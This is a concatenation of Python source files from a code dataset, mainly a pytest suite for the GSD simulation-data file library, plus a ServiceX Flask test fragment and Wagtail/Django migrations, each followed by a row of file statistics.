'code-gen-image': 'sslhep/servicex_code_gen_func_adl_xaod:develop'
}
mock_transform_request_read.assert_called_with('1234')
def test_get_single_request_404(self, mocker, client):
import servicex
mock_transform_request_read = mocker.patch.object(
servicex.models.TransformRequest, 'return_request',
return_value=None)
response = client.get('/servicex/transformation/1234')
assert response.status_code == 404
mock_transform_request_read.assert_called_with('1234')
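# Every test above follows the same pytest-mock pattern. A distilled,
# self-contained sketch of that pattern (the ``json`` target here is
# illustrative and unrelated to ServiceX):
def test_patch_object_pattern(mocker):
    import json

    mocked = mocker.patch.object(json, "loads", return_value={"ok": True})
    assert json.loads("ignored") == {"ok": True}
    mocked.assert_called_with("ignored")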
| [stats row for the file above: avg_line_length 50.85, max_line_length 99, alphanum_fraction 0.511308, 119 lines, 6,102 bytes; remaining qsc_* quality-signal columns elided] |
| 4c5bb0100771f81a5ee451b7a22e4f2485a69c57 | 2,657 | py | Python | bvspca/core/migrations/0034_auto_20180412_1059.py | rds0751/bvspca | f80eb90938f9db81d5c72a25aaa98869bbd6663a | ["MIT"] | stars: 10 (2019-02-25..2022-03-23) | issues: 18 (2021-03-08..2021-08-20) | forks: 3 (2019-01-29..2021-02-18) |
# Generated by Django 2.0.4 on 2018-04-12 16:59
from django.db import migrations
import wagtail.core.blocks
import wagtail.core.fields
import wagtail.images.blocks
class Migration(migrations.Migration):
dependencies = [
('core', '0033_auto_20180403_1426'),
]
operations = [
migrations.AlterField(
model_name='teampage',
name='group1_members',
field=wagtail.core.fields.StreamField((('member', wagtail.core.blocks.StructBlock((('name', wagtail.core.blocks.CharBlock(max_length=50)), ('role', wagtail.core.blocks.CharBlock(max_length=50, required=False)), ('role_since', wagtail.core.blocks.CharBlock(max_length=50, required=False)), ('location', wagtail.core.blocks.CharBlock(max_length=50, required=False)), ('pets', wagtail.core.blocks.CharBlock(max_length=200, required=False)), ('bio', wagtail.core.blocks.RichTextBlock(required=False)), ('photo', wagtail.images.blocks.ImageChooserBlock(help_text='Image should be at least 350px x 350px', required=False))))),), blank=True, verbose_name='members'),
),
migrations.AlterField(
model_name='teampage',
name='group2_members',
field=wagtail.core.fields.StreamField((('member', wagtail.core.blocks.StructBlock((('name', wagtail.core.blocks.CharBlock(max_length=50)), ('role', wagtail.core.blocks.CharBlock(max_length=50, required=False)), ('role_since', wagtail.core.blocks.CharBlock(max_length=50, required=False)), ('location', wagtail.core.blocks.CharBlock(max_length=50, required=False)), ('pets', wagtail.core.blocks.CharBlock(max_length=200, required=False)), ('bio', wagtail.core.blocks.RichTextBlock(required=False)), ('photo', wagtail.images.blocks.ImageChooserBlock(help_text='Image should be at least 350px x 350px', required=False))))),), blank=True, verbose_name='members'),
),
migrations.AlterField(
model_name='teampage',
name='group3_members',
field=wagtail.core.fields.StreamField((('member', wagtail.core.blocks.StructBlock((('name', wagtail.core.blocks.CharBlock(max_length=50)), ('role', wagtail.core.blocks.CharBlock(max_length=50, required=False)), ('role_since', wagtail.core.blocks.CharBlock(max_length=50, required=False)), ('location', wagtail.core.blocks.CharBlock(max_length=50, required=False)), ('pets', wagtail.core.blocks.CharBlock(max_length=200, required=False)), ('bio', wagtail.core.blocks.RichTextBlock(required=False)), ('photo', wagtail.images.blocks.ImageChooserBlock(help_text='Image should be at least 350px x 350px', required=False))))),), blank=True, verbose_name='members'),
),
]
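# The three AlterField operations above repeat one StructBlock definition
# verbatim. A hand-maintained equivalent (an illustrative sketch, not
# Django's generated output) could build the field once and reuse it:
def _members_stream_field():
    member_block = wagtail.core.blocks.StructBlock((
        ('name', wagtail.core.blocks.CharBlock(max_length=50)),
        ('role', wagtail.core.blocks.CharBlock(max_length=50, required=False)),
        ('role_since', wagtail.core.blocks.CharBlock(max_length=50, required=False)),
        ('location', wagtail.core.blocks.CharBlock(max_length=50, required=False)),
        ('pets', wagtail.core.blocks.CharBlock(max_length=200, required=False)),
        ('bio', wagtail.core.blocks.RichTextBlock(required=False)),
        ('photo', wagtail.images.blocks.ImageChooserBlock(
            help_text='Image should be at least 350px x 350px', required=False)),
    ))
    return wagtail.core.fields.StreamField(
        (('member', member_block),), blank=True, verbose_name='members')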
| [stats row for the file above: avg_line_length 83.03125, max_line_length 671, alphanum_fraction 0.717727, 31 lines, 2,657 bytes; remaining qsc_* quality-signal columns elided] |
| 4c68b2aa431206eaadff8f0a127bacbd657080e2 | 32,492 | py | Python | gsd/test/test_fl.py | mgorny/gsd | 4c544c412f1a65a8800e8169af044d32201bd985 | ["BSD-2-Clause"] | stars: 2 (2016-06-05..2018-12-06) | issues: null | forks: 1 (2016-11-30) |
# Copyright (c) 2016-2021 The Regents of the University of Michigan
# This file is part of the General Simulation Data (GSD) project, released under
# the BSD 2-Clause License.
"""Test gsd.fl."""
import gsd.fl
import gsd.pygsd
import numpy
import platform
import pytest
import random
import pathlib
import os
import shutil
test_path = pathlib.Path(os.path.realpath(__file__)).parent
def test_create(tmp_path):
"""Test creation of GSD files."""
gsd.fl.open(mode='xb',
name=tmp_path / "test_create.gsd",
application="test_create",
schema="none",
schema_version=[1, 2])
@pytest.mark.parametrize('typ', [
numpy.uint8,
numpy.uint16,
numpy.uint32,
numpy.uint64,
numpy.int8,
numpy.int16,
numpy.int32,
numpy.int64,
numpy.float32,
numpy.float64,
])
def test_dtype(tmp_path, typ):
"""Test all supported data types."""
data1d = numpy.array([1, 2, 3, 4, 5, 10012], dtype=typ)
data2d = numpy.array([[10, 20], [30, 40], [50, 80]], dtype=typ)
data_zero = numpy.array([], dtype=typ)
gsd.fl.open(mode='xb',
name=tmp_path / "test_dtype.gsd",
application="test_dtype",
schema="none",
schema_version=[1, 2])
with gsd.fl.open(name=tmp_path / "test_dtype.gsd",
mode='wb',
application="test_dtype",
schema="none",
schema_version=[1, 2]) as f:
f.write_chunk(name='data1d', data=data1d)
f.write_chunk(name='data2d', data=data2d)
f.write_chunk(name='data_zero', data=data_zero)
f.end_frame()
with gsd.fl.open(name=tmp_path / "test_dtype.gsd",
mode='rb',
application="test_dtype",
schema="none",
schema_version=[1, 2]) as f:
read_data1d = f.read_chunk(frame=0, name='data1d')
read_data2d = f.read_chunk(frame=0, name='data2d')
read_data_zero = f.read_chunk(frame=0, name='data_zero')
assert data1d.dtype == read_data1d.dtype
numpy.testing.assert_array_equal(data1d, read_data1d)
assert data2d.dtype == read_data2d.dtype
numpy.testing.assert_array_equal(data2d, read_data2d)
assert data_zero.dtype == read_data_zero.dtype
assert data_zero.shape == (0,)
# test again with pygsd
with gsd.pygsd.GSDFile(
file=open(str(tmp_path / "test_dtype.gsd"), mode='rb')) as f:
read_data1d = f.read_chunk(frame=0, name='data1d')
read_data2d = f.read_chunk(frame=0, name='data2d')
assert data1d.dtype == read_data1d.dtype
numpy.testing.assert_array_equal(data1d, read_data1d)
assert data2d.dtype == read_data2d.dtype
numpy.testing.assert_array_equal(data2d, read_data2d)
def test_metadata(tmp_path, open_mode):
"""Test file metadata."""
data = numpy.array([1, 2, 3, 4, 5, 10012], dtype=numpy.int64)
with gsd.fl.open(name=tmp_path / 'test_metadata.gsd',
mode=open_mode.write,
application='test_metadata',
schema='none',
schema_version=[1, 2]) as f:
assert f.mode == open_mode.write
for i in range(150):
f.write_chunk(name='data', data=data)
f.end_frame()
with gsd.fl.open(name=tmp_path / 'test_metadata.gsd',
mode=open_mode.read,
application='test_metadata',
schema='none',
schema_version=[1, 2]) as f:
assert f.name == str(tmp_path / 'test_metadata.gsd')
assert f.mode == open_mode.read
assert f.application == 'test_metadata'
assert f.schema == 'none'
assert f.schema_version == (1, 2)
assert f.nframes == 150
assert f.gsd_version == (2, 0)
# test again with pygsd
with gsd.pygsd.GSDFile(
file=open(str(tmp_path / 'test_metadata.gsd'), mode='rb')) as f:
assert f.name == str(tmp_path / 'test_metadata.gsd')
assert f.mode == 'rb'
assert f.application == 'test_metadata'
assert f.schema == 'none'
assert f.schema_version == (1, 2)
assert f.nframes == 150
assert f.gsd_version == (2, 0)
def test_append(tmp_path, open_mode):
"""Test that data chunks can be appended to existing files."""
with gsd.fl.open(name=tmp_path / 'test_append.gsd',
mode=open_mode.write,
application='test_append',
schema='none',
schema_version=[1, 2]):
pass
data = numpy.array([10], dtype=numpy.int64)
nframes = 1024
with gsd.fl.open(name=tmp_path / 'test_append.gsd',
mode='ab',
application='test_append',
schema='none',
schema_version=[1, 2]) as f:
assert f.mode == 'ab'
for i in range(nframes):
data[0] = i
f.write_chunk(name='data1', data=data)
data[0] = i * 10
f.write_chunk(name='data10', data=data)
f.end_frame()
with gsd.fl.open(name=tmp_path / 'test_append.gsd',
mode=open_mode.read,
application='test_append',
schema='none',
schema_version=[1, 2]) as f:
assert f.nframes == nframes
for i in range(nframes):
data1 = f.read_chunk(frame=i, name='data1')
data10 = f.read_chunk(frame=i, name='data10')
assert data1[0] == i
assert data10[0] == i * 10
# test again with pygsd
with gsd.pygsd.GSDFile(
file=open(str(tmp_path
/ 'test_append.gsd'), mode=open_mode.read)) as f:
assert f.nframes == nframes
for i in range(nframes):
data1 = f.read_chunk(frame=i, name='data1')
data10 = f.read_chunk(frame=i, name='data10')
assert data1[0] == i
assert data10[0] == i * 10
def test_chunk_exists(tmp_path, open_mode):
"""Test the chunk_exists API."""
data = numpy.array([1, 2, 3, 4, 5, 10012], dtype=numpy.int64)
with gsd.fl.open(name=tmp_path / 'test_chunk_exists.gsd',
mode=open_mode.write,
application='test_chunk_exists',
schema='none',
schema_version=[1, 2]) as f:
f.write_chunk(name='chunk1', data=data)
f.end_frame()
f.write_chunk(name='abcdefg', data=data)
f.end_frame()
f.write_chunk(name='test', data=data)
f.end_frame()
with gsd.fl.open(name=tmp_path / 'test_chunk_exists.gsd',
mode=open_mode.read,
application='test_chunk_exists',
schema='none',
schema_version=[1, 2]) as f:
assert f.chunk_exists(frame=0, name='chunk1')
read_data = f.read_chunk(frame=0, name='chunk1')
assert f.chunk_exists(frame=1, name='abcdefg')
read_data = f.read_chunk(frame=1, name='abcdefg')
assert f.chunk_exists(frame=2, name='test')
read_data = f.read_chunk(frame=2, name='test')
assert not f.chunk_exists(frame=1, name='chunk1')
with pytest.raises(Exception):
read_data = f.read_chunk(frame=1, name='chunk1')
assert not f.chunk_exists(frame=2, name='abcdefg')
with pytest.raises(Exception):
read_data = f.read_chunk(frame=2, name='abcdefg')
assert not f.chunk_exists(frame=0, name='test')
with pytest.raises(Exception):
read_data = f.read_chunk(frame=0, name='test')
assert not f.chunk_exists(frame=2, name='chunk1')
with pytest.raises(Exception):
read_data = f.read_chunk(frame=2, name='chunk1')
assert not f.chunk_exists(frame=0, name='abcdefg')
with pytest.raises(Exception):
read_data = f.read_chunk(frame=0, name='abcdefg')
assert not f.chunk_exists(frame=1, name='test')
with pytest.raises(Exception):
read_data = f.read_chunk(frame=1, name='test')
# test again with pygsd
with gsd.pygsd.GSDFile(
file=open(str(tmp_path / 'test_chunk_exists.gsd'), mode='rb')) as f:
assert f.chunk_exists(frame=0, name='chunk1')
read_data = f.read_chunk(frame=0, name='chunk1')
assert f.chunk_exists(frame=1, name='abcdefg')
read_data = f.read_chunk(frame=1, name='abcdefg')
assert f.chunk_exists(frame=2, name='test')
read_data = f.read_chunk(frame=2, name='test')
assert not f.chunk_exists(frame=1, name='chunk1')
with pytest.raises(Exception):
read_data = f.read_chunk(frame=1, name='chunk1')
assert not f.chunk_exists(frame=2, name='abcdefg')
with pytest.raises(Exception):
read_data = f.read_chunk(frame=2, name='abcdefg')
assert not f.chunk_exists(frame=0, name='test')
with pytest.raises(Exception):
read_data = f.read_chunk(frame=0, name='test')
assert not f.chunk_exists(frame=2, name='chunk1')
with pytest.raises(Exception):
read_data = f.read_chunk(frame=2, name='chunk1')
assert not f.chunk_exists(frame=0, name='abcdefg')
with pytest.raises(Exception):
read_data = f.read_chunk(frame=0, name='abcdefg')
assert not f.chunk_exists(frame=1, name='test')
with pytest.raises(Exception):
read_data = f.read_chunk(frame=1, name='test') # noqa
def test_readonly_errors(tmp_path, open_mode):
"""Test that read only files provide the appropriate errors."""
data = numpy.array([1, 2, 3, 4, 5, 10012], dtype=numpy.int64)
with gsd.fl.open(name=tmp_path / 'test_readonly_errors.gsd',
mode=open_mode.write,
application='test_readonly_errors',
schema='none',
schema_version=[1, 2]) as f:
for i in range(10):
f.write_chunk(name='chunk1', data=data)
f.end_frame()
data = numpy.array([1, 2, 3, 4, 5, 10012], dtype=numpy.int64)
with gsd.fl.open(name=tmp_path / 'test_readonly_errors.gsd',
mode='rb',
application='test_readonly_errors',
schema='none',
schema_version=[1, 2]) as f:
with pytest.raises(Exception):
f.end_frame()
with pytest.raises(Exception):
f.write_chunk(name='chunk1', data=data)
# test again with pygsd
with gsd.pygsd.GSDFile(
file=open(str(tmp_path
/ 'test_readonly_errors.gsd'), mode='rb')) as f:
with pytest.raises(Exception):
f.end_frame()
with pytest.raises(Exception):
f.write_chunk(name='chunk1', data=data)
def test_fileio_errors(tmp_path, open_mode):
"""Test that OS file I/O errors pass through."""
    # These tests cause Python to crash on Windows.
if platform.system() != "Windows":
with pytest.raises(Exception):
gsd.fl.open(name='/this/file/does/not/exist',
application='test_readonly_errors',
schema='none',
schema_version=[1, 2])
with open(str(tmp_path / 'test_fileio_errors.gsd'),
open_mode.write) as f:
f.write(b'test')
with pytest.raises(RuntimeError):
f = gsd.fl.open(name=tmp_path / 'test_fileio_errors.gsd',
mode=open_mode.read,
application='test_readonly_errors',
schema='none',
schema_version=[1, 2])
def test_dtype_errors(tmp_path, open_mode):
"""Test that unsupported data types result in errors."""
with pytest.raises(Exception):
data = numpy.array([1, 2, 3, 4, 5, 10012], dtype=numpy.bool_)
with gsd.fl.open(name=tmp_path / 'test_dtype_errors.gsd',
mode=open_mode.write,
application='test_dtype_errors',
schema='none',
schema_version=[1, 2]) as f:
f.write_chunk(name='chunk1', data=data)
f.end_frame()
with pytest.raises(Exception):
data = numpy.array([1, 2, 3, 4, 5, 10012], dtype=numpy.float16)
with gsd.fl.open(name=tmp_path / 'test_dtype_errors.gsd',
mode=open_mode.write,
application='test_dtype_errors',
schema='none',
schema_version=[1, 2]) as f:
f.write_chunk(name='chunk1', data=data)
f.end_frame()
with pytest.raises(Exception):
data = numpy.array([1, 2, 3, 4, 5, 10012], dtype=numpy.complex64)
with gsd.fl.open(name=tmp_path / 'test_dtype_errors.gsd',
mode=open_mode.write,
application='test_dtype_errors',
schema='none',
schema_version=[1, 2]) as f:
f.write_chunk(name='chunk1', data=data)
f.end_frame()
with pytest.raises(Exception):
data = numpy.array([1, 2, 3, 4, 5, 10012], dtype=numpy.complex128)
with gsd.fl.open(name=tmp_path / 'test_dtype_errors.gsd',
mode=open_mode.write,
application='test_dtype_errors',
schema='none',
schema_version=[1, 2]) as f:
f.write_chunk(name='chunk1', data=data)
f.end_frame()
def test_truncate(tmp_path):
"""Test that the truncate method functions."""
data = numpy.ascontiguousarray(numpy.random.random(size=(1000, 3)),
dtype=numpy.float32)
with gsd.fl.open(name=tmp_path / 'test_truncate.gsd',
mode='wb',
application='test_truncate',
schema='none',
schema_version=[1, 2]) as f:
assert f.mode == 'wb'
for i in range(10):
f.write_chunk(name='data', data=data)
f.end_frame()
assert f.nframes == 10
f.truncate()
assert f.nframes == 0
assert f.application == 'test_truncate'
assert f.schema == 'none'
assert f.schema_version == (1, 2)
f.write_chunk(name='data', data=data)
f.end_frame()
with gsd.fl.open(name=tmp_path / 'test_truncate.gsd',
mode='rb',
application='test_truncate',
schema='none',
schema_version=[1, 2]) as f:
assert f.name == str(tmp_path / 'test_truncate.gsd')
assert f.mode == 'rb'
assert f.application == 'test_truncate'
assert f.schema == 'none'
assert f.schema_version == (1, 2)
assert f.nframes == 1
def test_namelen(tmp_path, open_mode):
"""Test that long names are truncated as documented."""
app_long = 'abcdefga' * 100
schema_long = 'ijklmnop' * 100
chunk_long = '12345678' * 100
with gsd.fl.open(name=tmp_path / 'test_namelen.gsd',
mode=open_mode.write,
application=app_long,
schema=schema_long,
schema_version=[1, 2]) as f:
assert f.application == app_long[0:63]
assert f.schema == schema_long[0:63]
data = numpy.array([1, 2, 3, 4, 5, 10012], dtype=numpy.int64)
f.write_chunk(name=chunk_long, data=data)
f.end_frame()
with gsd.fl.open(name=tmp_path / 'test_namelen.gsd',
mode=open_mode.read,
application=app_long,
schema=schema_long,
schema_version=[1, 2]) as f:
data_read = f.read_chunk(0, name=chunk_long)
numpy.testing.assert_array_equal(data, data_read)
# test again with pygsd
with gsd.pygsd.GSDFile(
file=open(str(tmp_path / 'test_namelen.gsd'), mode='rb')) as f:
data_read = f.read_chunk(0, name=chunk_long)
numpy.testing.assert_array_equal(data, data_read)
def test_open(tmp_path):
"""Test the open() API."""
data = numpy.array([1, 2, 3, 4, 5, 10012], dtype=numpy.int64)
with gsd.fl.open(name=tmp_path / 'test.gsd',
mode='xb',
application='test_open',
schema='none',
schema_version=[1, 2]) as f:
f.write_chunk(name='chunk1', data=data)
f.end_frame()
with gsd.fl.open(name=tmp_path / 'test_2.gsd',
mode='xb+',
application='test_open',
schema='none',
schema_version=[1, 2]) as f:
f.write_chunk(name='chunk1', data=data)
f.end_frame()
f.read_chunk(0, name='chunk1')
with gsd.fl.open(name=tmp_path / 'test.gsd',
mode='wb',
application='test_open',
schema='none',
schema_version=[1, 2]) as f:
f.write_chunk(name='chunk1', data=data)
f.end_frame()
with gsd.fl.open(name=tmp_path / 'test.gsd',
mode='wb+',
application='test_open',
schema='none',
schema_version=[1, 2]) as f:
f.write_chunk(name='chunk1', data=data)
f.end_frame()
f.read_chunk(0, name='chunk1')
with gsd.fl.open(name=tmp_path / 'test.gsd',
mode='ab',
application='test_open',
schema='none',
schema_version=[1, 2]) as f:
f.write_chunk(name='chunk1', data=data)
f.end_frame()
with gsd.fl.open(name=tmp_path / 'test.gsd',
mode='rb',
application='test_open',
schema='none',
schema_version=[1, 2]) as f:
f.read_chunk(0, name='chunk1')
f.read_chunk(1, name='chunk1')
with gsd.fl.open(name=tmp_path / 'test.gsd',
mode='rb+',
application='test_open',
schema='none',
schema_version=[1, 2]) as f:
f.write_chunk(name='chunk1', data=data)
f.end_frame()
f.read_chunk(0, name='chunk1')
f.read_chunk(1, name='chunk1')
f.read_chunk(2, name='chunk1')
def test_find_matching_chunk_names(tmp_path, open_mode):
"""Test the find_matching_chunk_names API."""
data = numpy.array([1, 2, 3, 4, 5], dtype=numpy.float32)
with gsd.fl.open(name=tmp_path / 'test.gsd',
mode=open_mode.write,
application='test_find_matching_chunk_names',
schema='none',
schema_version=[1, 2]) as f:
f.write_chunk(name='log/A', data=data)
f.write_chunk(name='log/chunk2', data=data)
f.end_frame()
f.write_chunk(name='data/B', data=data)
f.end_frame()
with gsd.fl.open(name=tmp_path / 'test.gsd',
mode=open_mode.read,
application='test_find_matching_chunk_names',
schema='none',
schema_version=[1, 2]) as f:
all_chunks = f.find_matching_chunk_names('')
assert len(all_chunks) == 3
assert 'log/A' in all_chunks
assert 'log/chunk2' in all_chunks
assert 'data/B' in all_chunks
log_chunks = f.find_matching_chunk_names('log/')
assert len(log_chunks) == 2
assert 'log/A' in log_chunks
assert 'log/chunk2' in log_chunks
data_chunks = f.find_matching_chunk_names('data/')
assert len(data_chunks) == 1
assert 'data/B' in data_chunks
other_chunks = f.find_matching_chunk_names('other/')
assert len(other_chunks) == 0
# test again with pygsd
with gsd.pygsd.GSDFile(file=open(str(tmp_path
/ "test.gsd"), mode='rb')) as f:
all_chunks = f.find_matching_chunk_names('')
assert len(all_chunks) == 3
assert 'log/A' in all_chunks
assert 'log/chunk2' in all_chunks
assert 'data/B' in all_chunks
log_chunks = f.find_matching_chunk_names('log/')
assert len(log_chunks) == 2
assert 'log/A' in log_chunks
assert 'log/chunk2' in log_chunks
data_chunks = f.find_matching_chunk_names('data/')
assert len(data_chunks) == 1
assert 'data/B' in data_chunks
other_chunks = f.find_matching_chunk_names('other/')
assert len(other_chunks) == 0
def test_chunk_name_limit(tmp_path, open_mode):
"""Test that providing more than the maximum allowed chunk names errors."""
with gsd.fl.open(name=tmp_path / 'test.gsd',
mode=open_mode.write,
application='test_chunk_name_limit',
schema='none',
schema_version=[1, 2]) as f:
for i in range(65535):
f.write_chunk(name=str(i), data=numpy.array([i], dtype=numpy.int32))
# The GSD specification limits to 65535 names:
with pytest.raises(RuntimeError):
f.write_chunk(name='65536',
data=numpy.array([i], dtype=numpy.int32))
def test_many_names(tmp_path, open_mode):
"""Test that many chunk names can be written to a file."""
values = list(range(1000))
with gsd.fl.open(name=tmp_path / 'test.gsd',
mode=open_mode.write,
application='test_many_names',
schema='none',
schema_version=[1, 2]) as f:
for frame in range(5):
random.shuffle(values)
for value in values:
f.write_chunk(name=str(value),
data=numpy.array([value * 13], dtype=numpy.int32))
f.end_frame()
with gsd.fl.open(name=tmp_path / 'test.gsd',
mode=open_mode.read,
application='test_many_names',
schema='none',
schema_version=[1, 2]) as f:
for frame in range(5):
random.shuffle(values)
for value in values:
data = numpy.array([value * 13], dtype=numpy.int32)
data_read = f.read_chunk(frame=frame, name=str(value))
numpy.testing.assert_array_equal(data, data_read)
with gsd.pygsd.GSDFile(file=open(str(tmp_path
/ 'test.gsd'), mode='rb')) as f:
for frame in range(5):
random.shuffle(values)
for value in values:
data = numpy.array([value * 13], dtype=numpy.int32)
data_read = f.read_chunk(frame=frame, name=str(value))
numpy.testing.assert_array_equal(data, data_read)
def test_gsd_v1_read():
"""Test that the GSD v2 API can read v1 files."""
values = list(range(127))
values_str = [str(v) for v in values]
values_str.sort()
# test that we can:
# 1) Read chunk values correctly
# 2) Iterate through chunk names correctly
def check_v1_file_read(f):
assert f.gsd_version == (1, 0)
for frame in range(5):
random.shuffle(values)
for value in values:
data = numpy.array([value * 13], dtype=numpy.int32)
data_read = f.read_chunk(frame=frame, name=str(value))
numpy.testing.assert_array_equal(data, data_read)
chunk_names = f.find_matching_chunk_names('')
chunk_names.sort()
assert chunk_names == values_str
    # test with the C implementation
with gsd.fl.open(name=test_path / 'test_gsd_v1.gsd',
mode='rb',
application='test_gsd_v1',
schema='none',
schema_version=[1, 2]) as f:
check_v1_file_read(f)
# and the pure python implementation
with gsd.pygsd.GSDFile(
file=open(str(test_path / 'test_gsd_v1.gsd'), mode='rb')) as f:
assert f.gsd_version == (1, 0)
check_v1_file_read(f)
def test_gsd_v1_upgrade_read(tmp_path, open_mode):
"""Test that v1 files can be upgraded to v2."""
values = list(range(127))
values_str = [str(v) for v in values]
values_str.sort()
# test that we can:
# 1) Read chunk values correctly
# 2) Iterate through chunk names correctly
def check_v1_file_read(f):
for frame in range(5):
random.shuffle(values)
for value in values:
data = numpy.array([value * 13], dtype=numpy.int32)
data_read = f.read_chunk(frame=frame, name=str(value))
numpy.testing.assert_array_equal(data, data_read)
chunk_names = f.find_matching_chunk_names('')
chunk_names.sort()
assert chunk_names == values_str
shutil.copy(test_path / 'test_gsd_v1.gsd', tmp_path / 'test_gsd_v1.gsd')
with gsd.fl.open(name=tmp_path / 'test_gsd_v1.gsd',
mode='rb+',
application='test_gsd_v1',
schema='none',
schema_version=[1, 2]) as f:
assert f.gsd_version == (1, 0)
f.upgrade()
# check that we can read the file contents after the upgrade in memory
check_v1_file_read(f)
# and the same tests again after closing and opening the file
with gsd.fl.open(name=tmp_path / 'test_gsd_v1.gsd',
mode=open_mode.read,
application='test_gsd_v1',
schema='none',
schema_version=[1, 2]) as f:
assert f.gsd_version == (2, 0)
check_v1_file_read(f)
with gsd.pygsd.GSDFile(
file=open(str(tmp_path / 'test_gsd_v1.gsd'), mode='rb')) as f:
assert f.gsd_version == (2, 0)
check_v1_file_read(f)
def test_gsd_v1_write(tmp_path, open_mode):
"""Test that v2 can write to v1 files."""
values = list(range(256))
# include a very long chunk name to check that the name is truncated
# properly for the v1 format limitations
long_name = 'abcdefg' * 1000
values.append(long_name)
values_str = []
for v in values:
        if isinstance(v, str) and len(v) > 63:
            # v1 files truncate names to 63 chars
            v = v[0:63]
values_str.append(str(v))
values_str.sort()
shutil.copy(test_path / 'test_gsd_v1.gsd', tmp_path / 'test_gsd_v1.gsd')
# test that we can:
# 1) Read chunk values correctly
# 2) Iterate through chunk names correctly
def check_v1_file_read(f):
assert f.gsd_version == (1, 0)
chunk_names = f.find_matching_chunk_names('')
chunk_names.sort()
assert chunk_names == values_str
frame = 5
random.shuffle(values)
for value in values:
            if isinstance(value, int):
                data = numpy.array([value * 13], dtype=numpy.int32)
            else:
                data = numpy.array([hash(value)], dtype=numpy.int64)
# v1 files truncate names to 63 chars
if len(value) > 63:
value = value[0:63]
data_read = f.read_chunk(frame=frame, name=str(value))
numpy.testing.assert_array_equal(data, data_read)
# test that we can write new entries to the file
with gsd.fl.open(name=tmp_path / 'test_gsd_v1.gsd',
mode='rb+',
application='test_gsd_v1',
schema='none',
schema_version=[1, 2]) as f:
assert f.gsd_version == (1, 0)
for value in values:
            if isinstance(value, int):
                data = numpy.array([value * 13], dtype=numpy.int32)
            else:
                data = numpy.array([hash(value)], dtype=numpy.int64)
f.write_chunk(name=str(value), data=data)
f.end_frame()
check_v1_file_read(f)
    # test opening again with the C implementation
with gsd.fl.open(name=tmp_path / 'test_gsd_v1.gsd',
mode=open_mode.read,
application='test_gsd_v1',
schema='none',
schema_version=[1, 2]) as f:
check_v1_file_read(f)
# and the pure python implementation
with gsd.pygsd.GSDFile(
file=open(str(tmp_path / 'test_gsd_v1.gsd'), mode='rb')) as f:
assert f.gsd_version == (1, 0)
check_v1_file_read(f)
def test_gsd_v1_upgrade_write(tmp_path, open_mode):
"""Test that upgraded files can be written to after upgraded."""
values = list(range(256))
# include a very long chunk name to check that the name can be written
# after the upgrade
long_name = 'abcdefg' * 1000
values.append(long_name)
values_str = [str(v) for v in values]
values_str.sort()
shutil.copy(test_path / 'test_gsd_v1.gsd', tmp_path / 'test_gsd_v1.gsd')
# test that we can:
# 1) Read chunk values correctly
# 2) Iterate through chunk names correctly
def check_v1_file_read(f):
chunk_names = f.find_matching_chunk_names('')
chunk_names.sort()
assert chunk_names == values_str
frame = 5
random.shuffle(values)
for value in values:
            if isinstance(value, int):
                data = numpy.array([value * 13], dtype=numpy.int32)
            else:
                data = numpy.array([hash(value)], dtype=numpy.int64)
data_read = f.read_chunk(frame=frame, name=str(value))
numpy.testing.assert_array_equal(data, data_read)
# test that we can write new entries to the file
with gsd.fl.open(name=tmp_path / 'test_gsd_v1.gsd',
mode='rb+',
application='test_gsd_v1',
schema='none',
schema_version=[1, 2]) as f:
assert f.gsd_version == (1, 0)
f.upgrade()
assert f.gsd_version == (2, 0)
for value in values:
            if isinstance(value, int):
                data = numpy.array([value * 13], dtype=numpy.int32)
            else:
                data = numpy.array([hash(value)], dtype=numpy.int64)
f.write_chunk(name=str(value), data=data)
f.end_frame()
check_v1_file_read(f)
    # test opening again with the C implementation
with gsd.fl.open(name=tmp_path / 'test_gsd_v1.gsd',
mode=open_mode.read,
application='test_gsd_v1',
schema='none',
schema_version=[1, 2]) as f:
assert f.gsd_version == (2, 0)
check_v1_file_read(f)
# and the pure python implementation
with gsd.pygsd.GSDFile(
file=open(str(tmp_path / 'test_gsd_v1.gsd'), mode='rb')) as f:
assert f.gsd_version == (2, 0)
check_v1_file_read(f)
def test_zero_size(tmp_path, open_mode):
"""Test that zero-size data chunks are allowed."""
data = numpy.array([], dtype=numpy.float32)
with gsd.fl.open(name=tmp_path / 'test_zero.gsd',
mode=open_mode.write,
application='test_zero',
schema='none',
schema_version=[1, 2]) as f:
f.write_chunk(name='data', data=data)
f.end_frame()
with gsd.fl.open(name=tmp_path / 'test_zero.gsd',
mode=open_mode.read,
application='test_zero',
schema='none',
schema_version=[1, 2]) as f:
assert f.nframes == 1
data_read = f.read_chunk(frame=0, name='data')
assert data_read.shape == (0,)
assert data_read.dtype == numpy.float32
# test again with pygsd
with gsd.pygsd.GSDFile(
file=open(str(tmp_path
/ 'test_zero.gsd'), mode=open_mode.read)) as f:
assert f.nframes == 1
data_read = f.read_chunk(frame=0, name='data')
assert data_read.shape == (0,)
assert data_read.dtype == numpy.float32
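# A distilled write/read round trip using the same gsd.fl API exercised by
# the tests above (illustrative helper, not an additional test case).
def _demo_gsd_roundtrip(tmp_path):
    data = numpy.array([1, 2, 3], dtype=numpy.int32)
    with gsd.fl.open(name=tmp_path / 'demo.gsd', mode='xb',
                     application='demo', schema='none',
                     schema_version=[1, 2]) as f:
        f.write_chunk(name='demo/data', data=data)
        f.end_frame()
    with gsd.fl.open(name=tmp_path / 'demo.gsd', mode='rb',
                     application='demo', schema='none',
                     schema_version=[1, 2]) as f:
        numpy.testing.assert_array_equal(
            f.read_chunk(frame=0, name='demo/data'), data)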
| [stats row for the file above: avg_line_length 36.344519, max_line_length 80, alphanum_fraction 0.554813, 893 lines, 32,492 bytes; remaining qsc_* quality-signal columns elided] |
| d5bea47e3ac02072464e6013f83e0960d9dcd6df | 3,184 | py | Python | my_app/blog/migrations/0029_latestproduct_latestproductone_reviewproduct_reviewproductone_topproduct_topproductone.py | Faisal-Sey/official1 | 49af7a9fd60c980bd5d4ef7075a4c1f27ecc9642 | ["MIT"] | stars: 1 (2021-06-19) | issues: null | forks: null |
# Generated by Django 3.1 on 2020-09-17 09:35
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0028_delete_search'),
]
operations = [
migrations.CreateModel(
name='LatestProduct',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('items_name', models.CharField(max_length=300)),
('price', models.TextField(max_length=50)),
('Description', models.TextField(blank=True, max_length=600)),
('Image', models.ImageField(upload_to='')),
],
),
migrations.CreateModel(
name='LatestProductOne',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
